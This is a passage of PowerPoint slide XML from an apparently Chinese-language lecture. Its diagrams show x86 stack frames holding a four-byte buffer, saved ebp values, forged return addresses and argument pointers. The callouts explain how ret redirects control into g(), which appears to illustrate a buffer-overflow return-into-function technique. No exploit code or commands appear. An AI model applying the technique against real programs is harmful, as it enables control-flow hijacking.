          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="66588" idx="3"/>
            <a:endCxn id="66570" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4632325" y="5133975"/>
            <a:ext cx="396875" cy="31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6588" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="4953000"/>
            <a:ext cx="593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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="66589" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="66590" idx="3"/>
            <a:endCxn id="66574" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4632325" y="6064250"/>
            <a:ext cx="396875" cy="158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6590" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5881688"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66591" name="AutoShape 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="3733800"/>
            <a:ext cx="2133600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 131694"/>
              <a:gd name="adj2" fmla="val 39194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>指令转移控制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7623956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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67589" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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67590" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67591" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67592" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67593" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67594" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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67595" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67596" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67597" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67598" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67599" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67600" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67601" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67602" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67603" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="67587" idx="3"/>
            <a:endCxn id="67592" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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67604" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="4357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7605" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5881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7606" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="2833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7607" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="6521450"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67608" name="AutoShape 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="67595" idx="3"/>
            <a:endCxn id="67596" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="5438775"/>
            <a:ext cx="1588" cy="304800"/>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67609" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1752600"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>mov esp, ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ret </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67610" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="67609" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3352800" y="2247900"/>
            <a:ext cx="4083050" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8750"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2857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sp>
        <p:nvSpPr>
          <p:cNvPr id="67611" name="AutoShape 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4114800"/>
            <a:ext cx="2514600" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 113130"/>
              <a:gd name="adj2" fmla="val 35806"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回控制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>leave / return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>序列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67612" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="609600" y="1981200"/>
            <a:ext cx="304800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67613" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="593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a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67614" name="AutoShape 30"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="67615" idx="3"/>
            <a:endCxn id="67598" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4632325" y="6064250"/>
            <a:ext cx="396875" cy="158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7615" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5881688"/>
            <a:ext cx="593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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67616" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="67617" idx="3"/>
            <a:endCxn id="67595" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4632325" y="5438775"/>
            <a:ext cx="396875" cy="31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7617" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="5257800"/>
            <a:ext cx="593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esp</a:t>
            </a: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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25523517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CN">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>g()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="28638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ebp (frame 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="31686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address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68613" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="34734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68614" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="37623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argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68615" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="40671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f() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68616" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="43719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ebp (frame 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68617" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="46767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g()address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68618" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="49815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68619" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="52863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 argptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68620" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="55911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g() arg data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68621" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="62166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return addr(main)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68622" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="59118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ebp (orig)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68623" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="25590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buff[4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68624" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7740650" y="32908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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68625" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="48910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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68626" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="5911850"/>
            <a:ext cx="9715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Original</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="68627" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="68611" idx="3"/>
            <a:endCxn id="68616" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7435850" y="3016250"/>
            <a:ext cx="1588" cy="1508125"/>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68628" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
